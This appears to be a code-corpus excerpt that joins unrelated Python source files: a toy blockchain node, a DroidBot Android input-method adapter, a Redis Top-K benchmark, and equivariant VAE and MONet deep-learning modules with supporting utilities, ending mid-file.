# TODO does the coinbase tx affects merkle root?
coinbase_tx = self.new_tx('0', self.address, 50, 0)
tx_pool = self.tx_pool
# use pop keep thread safe
txs = [coinbase_tx] + [tx_pool.pop(0) for _ in range(len(tx_pool))]
block = dict(header)
# guess a nonce, this gonna takes ttttttttime
nonce = utils.get_nonce(header)
block['nonce'] = nonce
block['hash'] = utils.get_hash(block)
block['tx'] = txs
block['confirmation'] = 1
chain.append(block)
self.broadcast('block', block)
# update coinbase reward on ledger after fount the block
if not self.update_ledger([coinbase_tx]):
print('update ledger error???')
# TODO del this block
def send_coin(self, to_address, amount, fee):
"""
:param to_address: str, receiver address
:param amount: int,
:param fee: int, fee paid to miner
"""
tx = self.new_tx(self.address, to_address, amount, fee)
tx['hash'] = utils.get_hash(tx)
tx['signature'] = str(self.pvt_key.sign(tx['hash'].encode(), '')[0])
tx['pub_key'] = self.pub_key
tx['confirmation'] = 1
# boradcast tx
self.broadcast('tx', tx)
return True
def new_tx(self, from_address, to_address, amount, fee):
"""
generate new tx
:param from_address: str, sender address
:param to_address: str, recevier address
:param amount: int,
:param fee: int, fee paid to miner
:return: dict
"""
tx = {
'from': from_address,
'to': to_address,
'total_input': amount + fee,
'total_output': amount,
'ts': time.time(),
}
return tx
def get_target(self):
"""
get target hash for mining.
:return: str
"""
# TODO adjust target based on previous blocks' mining time
return settings.TARGET
def update_ledger(self, txs, ledger=None):
"""
update ledger, from a list of txs
:param txs: list,
:param ledger: dict,
:return: bool
"""
ledger = ledger or self.ledger
for tx in txs:
if tx['from'] != '0':
if ledger.get(tx['from'], 0) < tx['total_input']:
return False
ledger[tx['from']] = ledger.get(tx['from']) - tx['total_input']
ledger[tx['to']] = ledger.get(tx['to'], 0) + tx['total_output']
return True
def get_chain_from_node(self, node, entire_chain=True):
"""
get entire chain from a node
:param node: str,
:param ledger: dict,
"""
chain = []
ledger = {}
block_headers = None
if not entire_chain:
block_headers = {block['hash']: idx for idx, block in enumerate(self.chain)}
ret, data = utils._get(url=f'http://{node}/get_last_block')
if not (ret and data['ok']):
return [], {}
height = data.get('height', -1)
print(height)
while height > -1:
ret, data = utils._get(url=f'http://{node}/get_block/{height}')
print(ret)
if ret and data['ok']:
block = data.get('block', {})
print(f'verify chain: {vf.block(block)}')
if not vf.block(block):
break
if chain and chain[0]['prev_hash'] != block['hash']:
break
print(f'entire chain: {entire_chain}')
if not entire_chain and block['hash'] in block_headers.keys():
idx = block_headers.get(block['hash'])
chain = self.chain[:idx+1] + chain
break
chain.insert(0, block)
height -= 1
else:
return [], {}
# update ledger
txs = []
for block in chain:
txs.extend(block['tx'])
if not self.update_ledger(txs, ledger):
return [], {}
return chain, ledger
def init_chain(self):
for node in self.nodes:
chain, ledger = self.get_chain_from_node(node)
if chain:
self.chain = chain
self.ledger = ledger
return
# Create the genesis block
print('mining first block')
self.chain = []
self.ledger = {}
self.new_block()
def broadcast(self, type, data):
"""
Broadcast data to nodes
:param nodes: list of nodes
:param type: str, 'tx', 'block', or 'node'
:param data: a dict, depends on type,
"""
data = {type: data, 'port': self.port}
for node in list(self.nodes):
url = f'http://{node}/add_{type}'
ret, data = utils._post(url=url, json=data)
if not ret:
self.nodes.remove(node)
def add_node(self, node):
"""
Add a node to node list
:param node: str, like 1.1.1.1:5000
:return: bool
"""
if node in self.chain:
return True
self.broadcast('node', node)
self.nodes.append(node)
return True
def add_block(self, new_block, node):
"""
Add a block to local chain
:param new_block: dict,
:return: bool
"""
if not vf.block(new_block):
return False
for block in list(self.chain):
if block['hash'] == new_block['hash']:
block['confirmation'] += 1
return True
if new_block['prev_hash'] == self.chain[-1]['hash']:
self.chain.append(new_block)
self.broadcast('block', new_block)
return True
return self.resolve_conflicts(node)
def resolve_conflicts(self, node):
url = f'http://{node}/get_last_block'
ret, data = utils._get(url=url)
if not ret or not data['ok']:
return False
if data['height'] > len(self.chain):
chain, ledger = self.get_chain_from_node(node, entire_chain=False)
if chain:
self.chain = chain
self.ledger = ledger
return True
return False
def add_tx(self, new_tx):
if not vf.tx(new_tx):
return False
if not self.update_ledger([new_tx]):
return False
for tx in list(self.tx_pool):
if tx['hash'] == new_tx['hash']:
tx['confirmation'] += 1
return
self.tx_pool.append(new_tx)
self.broadcast('tx', new_tx)
return True
def get_nodes(self):
return list(self.nodes)
def get_chain(self):
return list(self.chain)
def get_tx_pool(self):
return list(self.tx_pool)
def get_pvt_key(self):
return self.pvt_key.exportKey().decode()
def get_address(self):
return self.address
def get_ledger(self):
return dict(self.ledger)
```
#### File: toychain/src/utils.py
```python
import time
import json
from Crypto.Random.random import randint
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256, RIPEMD
import requests
import settings
def new_rsa_key(pvt_key):
if pvt_key:
return RSA.importKey(pvt_key.encode())
# generate 2048bits long key
return RSA.generate(2048)
def get_hash(inp):
"""
Creates a SHA-256 hash of a input dictionary
:param inp: dict, such as block, tx
"""
b = json.dumps(inp, sort_keys=True).encode()
h = SHA256.new()
h.update(b)
return h.hexdigest()
def get_nonce(header):
target = header['target']
while True:
header = dict(header)
nonce = randint(0, settings.max_nonce)
header['nonce'] = nonce
hash = get_hash(header)
if hash < target:
return nonce
time.sleep(1) # 1 second
def get_nodes(port):
nodes = set()
data = {
'node': {
'port': port,
}
}
for node in settings.DEFAULT_NODES:
ret, info = _post(url=f'http://{node}/add_node', json=data)
if ret and info['ok']:
nodes.add(node)
return list(nodes)
def pub_2_address(pub_key):
"""
public key-(SHA256)-(RIPEMD160)->public key hash-(base58 encoding)->address
:param pub_key:
:return: str, address
"""
ripemd = RIPEMD.new()
sha = get_hash(pub_key)
ripemd.update(sha.encode())
pub_key_hash = ripemd.hexdigest()
# TODO base58 encoding
return pub_key_hash
def base58(inp):
pass
def _get(**kwargs):
try:
r = requests.get(**kwargs, timeout=5)
if r.status_code == 200:
return True, r.json()
except requests.exceptions.ConnectTimeout as e:
# print(e)
pass
except requests.exceptions.ConnectionError as e:
# print(e)
pass
except requests.exceptions.ReadTimeout as e:
# print(e)
pass
return False, None
def _post(**kwargs):
try:
r = requests.post(**kwargs, timeout=5)
if r.status_code == 200:
return True, r.json()
except requests.exceptions.ConnectTimeout as e:
# print(e)
pass
except requests.exceptions.ConnectionError as e:
# print(e)
pass
except requests.exceptions.ReadTimeout as e:
# print(e)
pass
except requests.exceptions.InvalidURL as e:
# print(e)
pass
return False, None
``` |
{
"source": "JinxKing/droidbot",
"score": 2
} |
#### File: droidbot/adapter/droidbot_ime.py
```python
import logging
import time
from .adapter import Adapter
DROIDBOT_APP_PACKAGE = "io.github.ylimit.droidbotapp"
IME_SERVICE = DROIDBOT_APP_PACKAGE + "/.DroidBotIME"
class DroidBotImeException(Exception):
"""
Exception in telnet connection
"""
pass
class DroidBotIme(Adapter):
"""
a connection with droidbot ime app.
"""
def __init__(self, device=None):
"""
initiate a emulator console via telnet
:param device: instance of Device
:return:
"""
self.logger = logging.getLogger(self.__class__.__name__)
if device is None:
from droidbot.device import Device
device = Device()
self.device = device
self.connected = False
def set_up(self):
device = self.device
if DROIDBOT_APP_PACKAGE in device.adb.get_installed_apps():
self.logger.debug("DroidBot app was already installed.")
else:
# install droidbot app
try:
import pkg_resources
droidbot_app_path = pkg_resources.resource_filename("droidbot", "resources/droidbotApp.apk")
install_cmd = "install %s" % droidbot_app_path
self.device.adb.run_cmd(install_cmd)
self.logger.debug("DroidBot app installed.")
except Exception as e:
self.logger.warning(e)
self.logger.warning("Failed to install DroidBotApp.")
def tear_down(self):
self.device.uninstall_app(DROIDBOT_APP_PACKAGE)
def connect(self):
r_enable = self.device.adb.shell("ime enable %s" % IME_SERVICE)
if r_enable.endswith("now enabled"):
r_set = self.device.adb.shell("ime set %s" % IME_SERVICE)
if r_set.endswith("selected"):
self.connected = True
return
self.logger.warning("Failed to connect DroidBotIME!")
def check_connectivity(self):
"""
check if droidbot app is connected
:return: True for connected
"""
return self.connected
def disconnect(self):
"""
disconnect telnet
"""
self.connected = False
r_disable = self.device.adb.shell("ime disable %s" % IME_SERVICE)
if r_disable.endswith("now disabled"):
self.connected = False
print("[CONNECTION] %s is disconnected" % self.__class__.__name__)
return
self.logger.warning("Failed to disconnect DroidBotIME!")
def input_text(self, text, mode=0):
"""
Input text to target device
:param text: text to input, can be unicode format
:param mode: 0 - set text; 1 - append text.
"""
input_cmd = "am broadcast -a DROIDBOT_INPUT_TEXT --es text \"%s\" --ei mode %d" % (text, mode)
self.device.adb.shell(str(input_cmd))
if __name__ == "__main__":
droidbot_ime_conn = DroidBotIme()
droidbot_ime_conn.set_up()
droidbot_ime_conn.connect()
droidbot_ime_conn.input_text("hello world!", 0)
droidbot_ime_conn.input_text("世界你好!", 1)
time.sleep(2)
droidbot_ime_conn.input_text("再见。Bye bye.", 0)
droidbot_ime_conn.disconnect()
droidbot_ime_conn.tear_down()
``` |
{
"source": "JinxLbj/testBloom",
"score": 3
} |
#### File: testBloom/tests/benchmark.py
```python
import requests
import redis
import time
def create_topk(ctx, k, width, depth):
ctx.execute_command('topk.reserve', 'bm_topk', k, k * width, depth, 0.5)
def detect(list_a, list_b):
return len(set(list_a).intersection(list_b)) / float(len(list_a))
redis = redis.Redis(host='localhost', port=6379, db=0)
redis_pipe = redis.pipeline()
redis.flushall()
start_time = time.time()
print "Downloading data"
url = 'http://www.gutenberg.org/files/2600/2600-0.txt'
page = requests.get(url)
print("--- %s seconds ---" % (time.time() - start_time))
start_time = time.time()
print "\nUsing sorted set with pipeline"
#for line in page:
for line in page.iter_lines():
if line is not '' and line is not ' ':
for word in line.split():
redis_pipe.zincrby('bm_text', 1, word)
responses = redis_pipe.execute()
for response in responses:
pass
real_results = redis.zrevrange('bm_text', 0, 49)
print("--- %s seconds ---" % (time.time() - start_time))
print('Memory used %s'% redis.memory_usage('bm_text'))
print('This is an accurate list for comparison')
print(redis.zcount('bm_text', '-inf', '+inf'))
# test Top-K
print("K Width(*k) Depth Memory Accuracy Time")
k_list = [10, 50, 100, 1000]
for k in k_list:
real_results = redis.zrevrange('bm_text', 0, k - 1)
for width in [4, 8]:
for depth in [3, 7, 10]:
redis.execute_command('DEL', 'bm_topk')
create_topk(redis, k, width, depth)
start_time = time.time()
for line in page.iter_lines():
if line is not '' and line is not ' ':
a = line.split()
redis_pipe.execute_command('topk.add', 'bm_topk', *a)
responses = redis_pipe.execute()
for response in responses:
pass
leaderboard = redis.execute_command('topk.list', 'bm_topk')
print(str(k) + " " + str(width) + " " + str(depth) + " " +
str(redis.memory_usage('bm_topk')) + " " +
str(detect(real_results, leaderboard) * 100) + " " +
str(time.time() - start_time))
``` |
{
"source": "jinxu06/gsubsampling",
"score": 2
} |
#### File: elm/model/eqv_monet.py
```python
from attrdict import AttrDict
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torch.distributions.normal import Normal
from torch.distributions.categorical import Categorical
from torch.distributions.kl import kl_divergence
import numpy as np
from genesis.modules.unet import UNet
import genesis.modules.seq_att as seq_att
from genesis.utils.misc import get_kl
from .base import AutoEncoderModule
from absl import logging
from genesis.utils.misc import average_ari
from .monet import MONet
from .eqv_vae import EquivariantVAE
class EquivariantComponentVAE(EquivariantVAE):
def __init__(self,
in_channels,
out_channels,
n_channels,
img_size,
dim_latent,
activation=F.relu,
readout_fn=None,
fiber_group='trivial',
n_rot=1,
avg_pool_size=1,
optim_lr=0.0001,
profiler=None):
super().__init__(in_channels=in_channels,
out_channels=out_channels+1,
n_channels=n_channels,
img_size=img_size,
dim_latent=dim_latent,
activation=activation,
readout_fn=readout_fn,
fiber_group=fiber_group,
n_rot=n_rot,
avg_pool_size=avg_pool_size,
optim_lr=optim_lr,
profiler=profiler)
def forward(self, x, log_mask):
K = 1
b_sz = x.size(0)
if isinstance(log_mask, list) or isinstance(log_mask, tuple):
K = len(log_mask)
# Repeat x along batch dimension
x = x.repeat(K, 1, 1, 1)
# Concat log_m_k along batch dimension
log_mask = torch.cat(log_mask, dim=0)
# -- Encode
mask = log_mask.exp()
x *= mask
x = torch.cat((x, mask), dim=1)
mu, log_sigma_sq, crs, z_eqv = self.encode(x)
sigma = torch.exp(log_sigma_sq / 2.)
z = self.reparameterize(mu, log_sigma_sq)
x_r = self.decode(z, crs)
# -- Track quantities of interest and return
x_r_k = torch.chunk(x_r, K, dim=0)
z_k = torch.chunk(z, K, dim=0)
mu_k = torch.chunk(mu, K, dim=0)
sigma_k = torch.chunk(sigma, K, dim=0)
stats = AttrDict(mu_k=mu_k, sigma_k=sigma_k, z_k=z_k)
return x_r_k, stats
class EquivariantMONet(MONet):
def __init__(self,
in_channels,
out_channels,
n_channels,
img_size,
dim_latent,
activation=torch.nn.ReLU(),
K_steps=5,
prior_mode='softmax',
montecarlo_kl=False,
pixel_bound=True,
kl_l_beta=0.5,
kl_m_beta=0.5,
pixel_std_fg=0.1,
pixel_std_bg=0.1,
optimizer='ADAM',
fiber_group='trivial',
n_rot=1,
avg_pool_size=3):
self.ldim = dim_latent
self.fiber_group = fiber_group
self.n_rot = n_rot
self.avg_pool_size = avg_pool_size
super().__init__(in_channels=in_channels,
out_channels=out_channels,
n_channels=n_channels,
img_size=img_size,
dim_latent=dim_latent,
activation=activation,
K_steps=K_steps,
prior_mode=prior_mode,
montecarlo_kl=montecarlo_kl,
pixel_bound=pixel_bound,
kl_l_beta=kl_l_beta,
kl_m_beta=kl_m_beta,
pixel_std_fg=pixel_std_fg,
pixel_std_bg=pixel_std_bg,
optimizer=optimizer)
def _create_networks(self):
core = UNet(int(np.log2(self.img_size)-1), 32)
self.att_process = seq_att.SimpleSBP(core)
# - Component VAE
self.comp_vae = EquivariantComponentVAE(self.in_channels+1,
self.out_channels,
self.n_channels,
self.img_size,
self.dim_latent,
activation=F.relu,
readout_fn=None,
fiber_group=self.fiber_group,
n_rot=self.n_rot,
avg_pool_size=self.avg_pool_size)
self.comp_vae.pixel_bound = False
```
#### File: elm/model/eqv_vae.py
```python
import os
import sys
from collections import OrderedDict
from absl import logging
import numpy as np
import torch
import torch.nn.functional as F
import torchvision
import torchvision.transforms.functional as TF
import torch.optim as optim
import pytorch_lightning as pl
from .base import VariationalAutoEncoderModule
from .eqv_ae import EquivariantAE
from elm.nn import EquivariantConvNN, EquivariantConvTransposeNN, MLP, EquivariantGConvNN, EquivariantGConvTransposeNN
from elm.utils import get_meshgrid, CyclicGArray, Rot2dOnCyclicGArray, FlipRot2dOnCyclicGArray, recursive_decomposition, product_of_representives
from elm.utils import visualize_2d_vector
class EquivariantVAE(VariationalAutoEncoderModule, EquivariantAE):
def __init__(self,
in_channels,
out_channels,
n_channels,
img_size,
dim_latent,
activation=F.relu,
readout_fn=None,
fiber_group='trivial',
n_rot=1,
avg_pool_size=1,
optim_lr=0.0001,
profiler=None):
super().__init__(in_channels=in_channels,
out_channels=out_channels,
n_channels=n_channels,
img_size=img_size,
dim_latent=dim_latent,
activation=activation,
readout_fn=readout_fn,
optim_lr=optim_lr,
profiler=profiler)
self.fiber_group = fiber_group
self.n_rot = n_rot
self.avg_pool_size = avg_pool_size
self._create_networks()
self.params = self.parameters()
logging.debug("--------- Equivariant VAE ---------")
logging.debug("-------- Trainable Variables ---------")
for name, p in self.named_parameters():
logging.debug("{}, {}".format(name, p.size()))
logging.debug("--------------------------------------")
def _create_networks(self):
final_fs = self.img_size // 2**4
nc = self.n_channels
if self.fiber_group == 'trivial':
self.quotient_orders = np.array([(2,), (2,), (2,), (2,), (final_fs,)])
self.encoder = EquivariantConvNN(in_channels=self.in_channels,
out_channels=[nc,nc,2*nc,2*nc,nc*final_fs//2],
kernel_size=[3,3,3,3,final_fs+1],
scale_factor=self.quotient_orders,
padding_mode='circular',
activation=self.activation,
out_activation=self.activation,
use_bias=True)
self.decoder = EquivariantConvTransposeNN(in_channels=2*nc,
out_channels=[2*nc,2*nc,nc,nc,nc,self.out_channels],
kernel_size=[final_fs+1,3,3,3,3,3],
scale_factor=np.concatenate([self.quotient_orders[::-1], np.ones((1,1), dtype=np.int32)]),
padding_mode='circular',
activation=self.activation,
out_activation=self.readout_fn,
use_bias=True,
avg_pool_size=self.avg_pool_size)
elif self.fiber_group == 'rot_2d':
self.quotient_orders = np.array([(2,1), (2,1), (2,1), (2,2), (final_fs,2)])
self.encoder = EquivariantGConvNN(in_channels=self.in_channels,
out_channels=[nc,nc,2*nc,2*nc,nc*final_fs//2],
kernel_size=[3,3,3,3,final_fs+1],
scale_factor=self.quotient_orders,
padding_mode='circular',
activation=self.activation,
out_activation=self.activation,
use_bias=True,
fiber_group=self.fiber_group,
n_rot=self.n_rot)
self.decoder = EquivariantGConvTransposeNN(in_channels=2*nc,
out_channels=[2*nc,2*nc,nc,nc,nc,self.out_channels],
kernel_size=[final_fs+1,3,3,3,3,3],
scale_factor=np.concatenate([self.quotient_orders[::-1], np.ones((1,2), dtype=np.int32)]),
padding_mode='circular',
activation=self.activation,
out_activation=self.readout_fn,
use_bias=True,
fiber_group=self.fiber_group,
n_rot=self.n_rot,
avg_pool_size=self.avg_pool_size)
elif self.fiber_group == 'flip_rot_2d':
self.quotient_orders = np.array([(2,1,1), (2,1,1), (2,1,1), (2,2,1), (final_fs,2,2)])
self.encoder = EquivariantGConvNN(in_channels=self.in_channels,
out_channels=[nc,nc,2*nc,2*nc,nc*final_fs//2],
kernel_size=[3,3,3,3,final_fs+1],
scale_factor=self.quotient_orders,
padding_mode='circular',
activation=self.activation,
out_activation=self.activation,
use_bias=True,
fiber_group=self.fiber_group,
n_rot=self.n_rot)
self.decoder = EquivariantGConvTransposeNN(in_channels=2*nc,
out_channels=[2*nc,2*nc,nc,nc,nc,self.out_channels],
kernel_size=[final_fs+1,3,3,3,3,3],
scale_factor=np.concatenate([self.quotient_orders[::-1], np.ones((1,3), dtype=np.int32)]),
padding_mode='circular',
activation=self.activation,
out_activation=self.readout_fn,
use_bias=True,
fiber_group=self.fiber_group,
n_rot=self.n_rot,
avg_pool_size=self.avg_pool_size)
else:
raise Exception("Unknown fiber group {}".format(self.fiber_group))
self.flatten = torch.nn.Flatten()
self.unflatten = torch.nn.Unflatten(dim=1, unflattened_size=(2*nc,1,1))
self.encoder_mlp = MLP(in_sizes=nc*final_fs//2, out_sizes=[2*self.dim_latent])
self.decoder_mlp = MLP(in_sizes=self.dim_latent, out_sizes=[2*nc], out_activation=self.activation)
def g_act_z(self, g, z_eqv, origin=(0, 0)):
b = z_eqv.elems.size()[0]
g = torch.Tensor([g]).repeat(b,1).type_as(z_eqv.elems)
T = CyclicGArray(elems=torch.Tensor([origin]).repeat(b,1).type_as(z_eqv.elems), N=self.img_size, D=2)
if not self.fiber_group == 'trivial':
z_eqv.garray_N = T.inv().mul(z_eqv.garray_N)
if self.fiber_group == 'trivial':
G = CyclicGArray(elems=g[:, :2], N=self.img_size, D=2)
elif self.fiber_group == 'rot_2d':
F = CyclicGArray(elems=g[:, 2:], N=self.n_rot)
B = CyclicGArray(elems=g[:, :2], N=self.img_size, D=2)
G = Rot2dOnCyclicGArray(B, F)
elif self.fiber_group == 'flip_rot_2d':
F = DihedralGArray(elems=g[:, 2:], N=self.n_rot)
B = CyclicGArray(elems=g[:, :2], N=self.img_size, D=2)
G = FlipRot2dOnCyclicGArray(B, F)
else:
raise Exception("Unknown fiber group {}".format(self.fiber_group))
z_eqv = G.mul(z_eqv)
if not self.fiber_group == 'trivial':
z_eqv.garray_N = T.mul(z_eqv.garray_N)
crs = recursive_decomposition(z_eqv, quotient_orders=self.quotient_orders, fiber_group=self.fiber_group)
return crs, z_eqv
def g_act_x(self, g, x, origin=(0, 0), n_rot=4):
if isinstance(g, np.ndarray):
g = g.tolist()
x = torch.roll(x, shifts=[32-origin[0],32-origin[1]], dims=[-2,-1])
if len(g) >= 4 and g[3] > 0:
x = TF.vflip(x)
x = torch.roll(x, shifts=-self.img_size+1, dims=-2)
if len(g) >= 3 and g[2] > 0:
angle = (360/n_rot) * g[2]
rad = angle / 180 * np.pi
d = 0.5*np.sqrt(2)
r1 = np.array([np.cos(np.pi/4) * d, np.sin(np.pi/4) * d])
r2 = np.array([np.cos(rad+np.pi/4) * d, np.sin(rad+np.pi/4) * d])
r = tuple((r2 - r1).round().astype(np.int32).tolist())
x = TF.rotate(x, angle)
x = torch.roll(x, shifts=r, dims=[-2,-1])
if len(g) >= 2 and np.abs(g[:2]).max() > 0:
x = torch.roll(x, shifts=[g[0], g[1]], dims=[-2,-1])
x = torch.roll(x, shifts=[origin[0]-32,origin[1]-32], dims=[-2,-1])
return x
def encode(self, x):
z_inv, crs, z_eqv = self.encoder(x)
z_inv = self.encoder_mlp(self.flatten(z_inv))
mu, log_sigma_sq = torch.chunk(z_inv, chunks=2, dim=-1)
return mu, log_sigma_sq, crs, z_eqv
def decode(self, z_inv, crs):
z_inv = self.unflatten(self.decoder_mlp(z_inv))
x_hat = self.decoder(z_inv, crs)
return x_hat
def reparameterize(self, mu, log_sigma_sq):
sigma = torch.exp(log_sigma_sq/2.)
eps = torch.normal(torch.zeros_like(mu), torch.ones_like(sigma))
return eps * sigma + mu
def reconstruct(self, x, g=None, origin=(0,0)):
mu, _, crs, z_eqv = self.encode(x)
if g is not None:
crs, z_eqv = self.g_act_z(g, z_eqv, origin)
x_hat = self.decode(mu, crs)
return x_hat
def generate(self, crs, n_samples=16):
z_inv = torch.normal(torch.zeros(n_samples, self.dim_latent), torch.ones(n_samples, self.dim_latent))
z_eqv = torch.rand(n_samples, 3) * torch.Tensor([[self.n_rot, self.img_size, self.img_size]]).type_as(z_inv)
if self.fiber_group == 'trivial':
pass
elif self.fiber_group == 'rot_2d':
pass
x_hat = self.decode(z_inv, crs)
return x_hat
def forward(self, x):
mu, _, _, z_eqv = self.encode(x)
return torch.cat([mu, z_eqv.elems], dim=1)
def compute_loss_and_metrics(self, x, y=None):
mu, log_sigma_sq, crs, z_eqv = self.encode(x)
z_inv = self.reparameterize(mu, log_sigma_sq)
x_hat = self.decode(z_inv, crs)
recon_loss = F.mse_loss(x_hat, x, reduction='sum') / x.size()[0]
kl_loss = torch.sum(-0.5 * torch.sum(1 + log_sigma_sq - mu ** 2 - log_sigma_sq.exp(), dim = 1), dim = 0) / x.size()[0]
loss = recon_loss + kl_loss
logs = {
"recon": recon_loss,
"kl": kl_loss,
"elbo": loss
}
return loss, logs
```
#### File: elm/nn/eqv_conv_nn.py
```python
from collections import deque
import numpy as np
import torch
import torch.nn.functional as F
import pytorch_lightning as pl
from .conv_nn import BaseConvNN, ConvNN
from .subsampling import EquivariantSubSampling, EquivariantFeatureSpace2Group
from .upsampling import EquivariantUpSampling
from elm.utils import get_same_pad, kaiming_init
from elm.utils import CyclicGArray, Rot2dOnCyclicGArray, FlipRot2dOnCyclicGArray, recursive_decomposition, product_of_representives
class EquivariantConvNN(ConvNN):
def __init__(self,
in_channels,
out_channels,
kernel_size,
scale_factor=1,
padding_mode='circular',
activation=F.relu,
out_activation=None,
use_bias=True,
before_activation=False,
device='cuda'):
super().__init__(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
padding_mode=padding_mode,
activation=activation,
out_activation=out_activation,
use_bias=use_bias,
device=device)
self.scale_factor = scale_factor
self.before_activation = before_activation
self.f2q = EquivariantFeatureSpace2Group(in_channels=self.out_channels[0],
fiber_group='trivial',
temperature=0.0001)
for i, layer in enumerate(self.layers):
layer['subsampling'] = EquivariantSubSampling(scale_factor=self.scale_factor[i, 0], fiber_group='trivial')
def forward(self, x):
_, _, h, w = x.size()
y = x
crs = None
for i, layer in enumerate(self.layers):
_, _, h, w = y.size()
pad = get_same_pad(size=[h, w], kernel_size=self.kernel_size[i], stride=1)
y = F.pad(y, pad, mode=self.padding_mode)
y = layer['conv'](y)
if layer['activation'] is not None:
y = layer['activation'](y)
if not self.before_activation and self.scale_factor[i, 0] > 1:
if crs is None:
z = self.f2q(y)
garray = CyclicGArray(elems=z[:, 2:], N=h, D=2)
crs = recursive_decomposition(garray, quotient_orders=self.scale_factor, fiber_group='trivial')
y = layer['subsampling'](y, crs[:, i])
return y, crs, garray
class EquivariantConvTransposeNN(BaseConvNN):
def __init__(self,
in_channels,
out_channels,
kernel_size,
scale_factor=1,
padding_mode='circular',
activation=F.relu,
out_activation=None,
use_bias=True,
avg_pool_size=1,
device='cuda'):
super().__init__(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
padding_mode=padding_mode,
activation=activation,
out_activation=out_activation,
use_bias=use_bias,
device=device)
self.scale_factor = scale_factor
self.avg_pool_size = avg_pool_size
self.layers = []
for i in range(self.num_layers):
layer = {}
layer['upsampling'] = EquivariantUpSampling(scale_factor=self.scale_factor[i, 0], fiber_group='trivial')
layer['conv_transpose'] = torch.nn.ConvTranspose2d(self.in_channels[i],
self.out_channels[i],
kernel_size=self.kernel_size[i],
stride=1,
padding=self.kernel_size[i]-1,
bias=self.use_bias)
self.add_module("conv_transpose_{}".format(i+1), layer['conv_transpose'])
if self.avg_pool_size > 1:
layer['smoothing'] = torch.nn.AvgPool2d(self.avg_pool_size, stride=1)
layer['activation'] = self.activation if i < self.num_layers - 1 else self.out_activation
kaiming_init(layer['conv_transpose'], F.relu, 1, mode='fan_out', use_bias=self.use_bias)
self.layers.append(layer)
def forward(self, x, crs):
y = x
crs = deque(torch.unbind(crs, dim=1))
for i, layer in enumerate(self.layers):
if self.scale_factor[i, 0] > 1:
y = layer['upsampling'](y, crs.pop())
y = y * self.scale_factor[i, 0]
y = F.pad(y, pad=[(self.kernel_size[i]-1)//2 for _ in range(4)], mode=self.padding_mode)
y = layer['conv_transpose'](y)
if self.avg_pool_size > 1:
_, _, h, w = y.size()
pad = get_same_pad(size=[h, w], kernel_size=self.avg_pool_size, stride=1)
y = F.pad(y, pad=pad, mode=self.padding_mode)
y = layer['smoothing'](y)
if layer['activation'] is not None:
y = layer['activation'](y)
return y
```
#### File: elm/nn/gaussian_blur.py
```python
import numpy as np
import torch
import torch.nn.functional as F
from scipy.ndimage import gaussian_filter
class GaussianBlur(torch.nn.Module):
def __init__(self, kernel_size, sigma=1.0):
super().__init__()
for k in kernel_size:
assert k % 2==1, "currently only support odd kernel size"
self.n_dim = len(kernel_size)
self.kernel_size = kernel_size
self.sigma = sigma
inputs = np.zeros(self.kernel_size)
inputs[tuple([k//2 for k in self.kernel_size])] = np.prod(self.kernel_size)
kernel = gaussian_filter(inputs, sigma=self.sigma, mode='constant')
self.register_buffer("kernel", torch.Tensor(kernel))
def forward(self, x):
pad = []
for k in self.kernel_size[::-1]:
pad += [k//2, k//2]
x = F.pad(x, pad=pad, mode='circular')
weights = torch.unsqueeze(torch.unsqueeze(self.kernel.type_as(x), dim=0), dim=0)
return F.conv3d(x, weights)
```
#### File: forge/forge/data.py
```python
from builtins import range
import numpy as np
import itertools
import tensorflow as tf
def tensors_from_data(data_dict, batch_size, axes=None, shuffle=False):
"""Turns a dict of numpy.ndarrays into a dict of minibatch tensors.
Arrays are split into minibatches of `batch_size` along `axes`. If `axes` is None,
then all arrays are split along axis==0. Tensors can iterate sequentially over the
passed arrays if shuffle=False or in a random order if shuffle=True.
:param data_dict: dict of {key: nump.ndarray}.
:param batch_size: integer
:param axes: dict of {k: integer} or None
:param shuffle: boolean.
:return: dict of {key: tf.Tensor}
"""
keys = list(data_dict.keys())
if axes is None:
axes = {k: 0 for k in keys}
key = keys[0]
ax = axes[key]
n_entries = data_dict[key].shape[ax]
if shuffle:
def idx_fun():
return np.random.choice(n_entries, batch_size, replace=False)
else:
rolling_idx = itertools.cycle(range(0, n_entries - batch_size + 1, batch_size))
def idx_fun():
start = next(rolling_idx)
end = start + batch_size
return np.arange(start, end)
def data_fun():
idx = idx_fun()
minibatch = []
for k in keys:
item = data_dict[k]
minibatch_item = item.take(idx, axes[k])
minibatch.append(minibatch_item)
return minibatch
minibatch = data_fun()
types = [getattr(tf, str(m.dtype)) for m in minibatch]
tensors = tf.py_func(data_fun, [], types)
for t, m in zip(tensors, minibatch):
t.set_shape(m.shape)
tensors = data_dict.__class__({k: v for k, v in zip(keys, tensors)})
return tensors
```
#### File: forge/forge/debug.py
```python
from __future__ import print_function
import functools
import sys
import traceback
import pdb
def debug_on(*exceptions):
"""Adapted from https://stackoverflow.com/questions/18960242/is-it-possible-to-automatically-break-into-the-debugger-when-a-exception-is-thro/18962528
"""
if not exceptions:
exceptions = (AssertionError,)
def decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except exceptions as err:
last_traceback = sys.exc_info()[2]
traceback.print_tb(last_traceback)
print(err)
pdb.post_mortem(last_traceback)
return wrapper
return decorator
```
#### File: genesis/models/vae_config.py
```python
from attrdict import AttrDict
import torch
import torch.nn as nn
from torch.distributions.normal import Normal
from forge import flags
from modules.blocks import Flatten
from modules.decoders import BroadcastDecoder
from third_party.sylvester.VAE import VAE
# GatedConvVAE
flags.DEFINE_integer('latent_dimension', 64, 'Latent channels.')
flags.DEFINE_boolean('broadcast_decoder', False,
'Use broadcast decoder instead of deconv.')
# Losses
flags.DEFINE_boolean('pixel_bound', True, 'Bound pixel values to [0, 1].')
flags.DEFINE_float('pixel_std', 0.7, 'StdDev of reconstructed pixels.')
def load(cfg):
return BaselineVAE(cfg)
class BaselineVAE(nn.Module):
def __init__(self, cfg):
super(BaselineVAE, self).__init__()
cfg.K_steps = None
# Configuration
self.ldim = cfg.latent_dimension
self.pixel_std = cfg.pixel_std
self.pixel_bound = cfg.pixel_bound
self.debug = cfg.debug
# Module
nin = cfg.input_channels if hasattr(cfg, 'input_channels') else 3
self.vae = VAE(self.ldim, [nin, cfg.img_size, cfg.img_size], nin)
if cfg.broadcast_decoder:
self.vae.p_x_nn = nn.Sequential(
Flatten(),
